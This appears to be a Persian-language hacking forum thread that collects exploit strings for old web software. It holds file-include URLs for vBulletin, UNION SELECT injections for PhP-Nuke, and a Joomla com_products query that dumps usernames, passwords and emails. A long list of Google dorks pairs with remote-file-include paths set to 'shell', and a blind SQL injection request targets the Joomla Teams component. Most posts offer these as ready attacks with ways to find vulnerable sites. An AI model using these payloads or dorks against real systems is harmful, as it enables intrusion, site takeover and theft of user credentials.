Arrow  Text :   

======= 

################################## 
# Script: vBulletin Version 3.8.4 File Include Vulnerability 

#Language: $php$ 

#Author : $EjRaM-HaCKeR$ 

#My home : [ www.sec-center.com ] 

#Greetz to : [Dr.eXe ,moroccoHaCkEr, All My Friends 
# $ EgyptHaCkeR ] 

# mail : m2z@9.cn $ tsv@hotmail.com 
################################# 

############# ===[ Exploits ]=== ########### 
# 1- 
http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI] 
# 2- 
http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt? 
######################## 




$EjRaM-HaCKeR$

spyman · بهمن 90

PhP-Nuke user.php SQL Injection

 view source 
print? 
----------------------------Information------------------------------------------------ 
+Name : PhP-Nuke user.php SQL Injection 
+Autor : Easy Laster 
+Date   : 04.03.2010 
+Script  : PhP-Nuke 
+Download : its a old version http://phpnuke.org/ 
+Price : 12,00$ 
+Language :PHP 
+Discovered by Easy Laster 
+Security Group 4004-Security-Project 
+Greetz to Team-Internet ,Underground Agents 
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, 
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, 
N00bor,novaca!ne. 

--------------------------------------------------------------------------------------- 

___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _| 
 |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                             |___|                 |___|            


---------------------------------------------------------------------------------------- 
+Vulnerability : http://www.site.com/phpnuke/user.php?op=userinfo&uname= 
+Exploitable   : http://www.site.com/phpnuke/user.php?op=userinfo&uname='+union+select 
+1,2,version(),4,5,6,7,8,9,10,11,12,13--+ 
-----------------------------------------------------------------------------------------  
  		 	  		 		  		  		 		  		 		 			 				__________________

spyman · بهمن 90

Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability

============================================================================== 
Joomla com_about 'intCategoryId' Remote Sql Injection Vulnerability ///////// 
============================================================================== 

*************************************************************************** 
Dork = inurl:com_products "intCategoryId" 
########################################################################### 
===[ Exploit ]=== 

=> http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+jos_users&op=category_details 
or 
=> http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+mos_users&op=category_details

novinfard · بهمن 90

اینم سری اول
inurl:"com_admin"

administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_simpleboard
/components/com_simpleboard/file_upload.php?sbp=shell

inurl:"com_hashcash"
/components/com_hashcash/server.php?mosConfig_absolute_path=shell

inurl:"com_htmlarea3_xtd-c"

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell

inurl:"com_sitemap"
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell

inurl:"com_performs"
components/com_performs/performs.php?mosConfig_absolute_path=shell

inurl:"com_forum"
/components/com_forum/download.php?phpbb_root_path=

inurl:"com_pccookbook"
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell

inurl:index.php?option=com_extcalendar
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell

inurl:"minibb"
components/minibb/index.php?absolute_path=shell

inurl:"com_smf"
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=shell

inurl:"com_pollxt"
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell

inurl:"com_loudmounth"
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell

inurl:"com_videodb"
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l

inurl:index.php?option=com_pcchess
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell

inurl:"com_multibanners"
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell

inurl:"com_a6mambohelpdesk"
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l

inurl:"com_colophon"
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell

inurl:"com_mgm"
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell

inurl:"com_mambatstaff"
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell

inurl:"com_securityimages"
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell

/components/com_securityimages/lang.php?mosConfig_absolute_path=shell

inurl:"com_artlinks"
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell

inurl:"com_galleria"
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell

inurl:"com_akocomment"
/akocomments.php?mosConfig_absolute_path=shell

inurl:"com_cropimage"
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell

inurl:"com_kochsuite"
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell

inurl:"com_comprofiler"
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell

inurl:"com_zoom"
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell

/components/com_zoom/includes/database.php?mosConfig_absolute_path=shell

inurl:"com_serverstat"
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll

inurl:"com_fm"
components/com_fm/fm.install.php?lm_absolute_path=shell

inurl:com_mambelfish
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell

inurl:com_lmo
components/com_lmo/lmo.php?mosConfig_absolute_path=shell

inurl:com_linkdirectory
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell

inurl:com_mtree
components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell

inurl:com_jim
administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell

inurl:com_webring
administrator/components/com_webring/admin.webring.docs.php?component_dir=shell

inurl:com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=

inurl:com_babackup
administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell

inurl:com_lurm_constructor
administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell

inurl:com_mambowiki
components/com_mambowiki/ MamboLogin.php?IP=shell

inurl:com_a6mambocredits
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell

inurl:com_phpshop
administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell

inurl:com_cpg
components/com_cpg/cpg.php?mosConfig_absolute_path=shell

inurl:com_moodle
components/com_moodle/moodle.php?mosConfig_absolute_path=shell

inurl:com_extended_registration
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell

inurl:com_mospray
components/com_mospray/scripts/admin.php?basedir=shell

inurl:com_bayesiannaivefilter
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell

inurl:com_uhp
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell

inurl:com_peoplebook
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell

inurl:com_mmp
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell

inurl:com_reporter
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell

inurl:com_madeira
/components/com_madeira/img.php?url=shell

inurl:com_jd-wiki
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell

inurl:com_bsq_sitestatsا
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
/com_bsq_sitestats/external/rssfeed.php?baseDir=she

این باگ ها مربوط به نسخه های قدیمی جوملا(mosconfig مربوط به جوملا 1 است و legacy جوملا 1.5) است.

لطفا در معرفی کردن نسخه ی دقیق جوملای مورد استفاده را نیز ذکر کنید.

لطفا منبع هر موضوع را نیز ذکر کنید.

spyman · بهمن 90

این باگ ها مربوط به نسخه های قدیمی جوملا(mosconfig مربوط به جوملا 1 است و legacy جوملا 1.5) است.
لطفا در معرفی کردن نسخه ی دقیق جوملای مورد استفاده را نیز ذکر کنید.

لطفا منبع هر موضوع را نیز ذکر کنید.

سلام

من اول تایپیک گفتم( جدام نمیشه . درهم و برهمه ):21:

باگهای جوملا زیاد که خیلی هاش تو 25 جدید که خودم آزمایش کردم حل شده

من از ورژن 1 دارم میزارم تا .....

من هرچی بزارم چه خودم ساختم جه کپی کنم از سایت آشیانست چون معلم من در باره هک این سایت بسیار عالی

ویرایش شده در بهمن 90 توسط spyman

spyman · بهمن 90

Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities

Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection
Vulnerabilities

Name Teams
Vendor http://www.joomlamo.com
Versions Affected 1_1028_100809_1711

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-08-10

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX

I. ABOUT THE APPLICATION
________________________

Teams is a base application for entering leagues, teams,
players, uniforms, and games.

II. DESCRIPTION
_______________

Some parameters are not properly sanitised before being
used in SQL queries.

III. ANALYSIS
_____________

Summary:

A) Multiple Blind SQL Injection

A) Multiple Blind SQL Injection
_______________________________

Many parameters are not properly sanitised before being
used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.

IV. SAMPLE CODE
_______________

A) Multiple Blind SQL Injection

POST /index.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 205

FirstName=mario&LastName=rossi&Notes=sds&TeamNames[1]=on&UniformNumber[1]=1
&Active=Y&cid[]=&PlayerID=-1 OR
(SELECT(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&task
=save&controller=player

V. FIX
______

No fix.

_.-*بازار باگ جوملا مخلوت ( جدام نمیشه . درهم و برهمه )*-._

52 پست در این موضوع

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

Share this post

Link to post

Share on other sites

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

ایجاد یک حساب کاربری

ورود به حساب کاربری

_.-بازار باگ جوملا مخلوت ( جدام نمیشه . درهم و برهمه )-._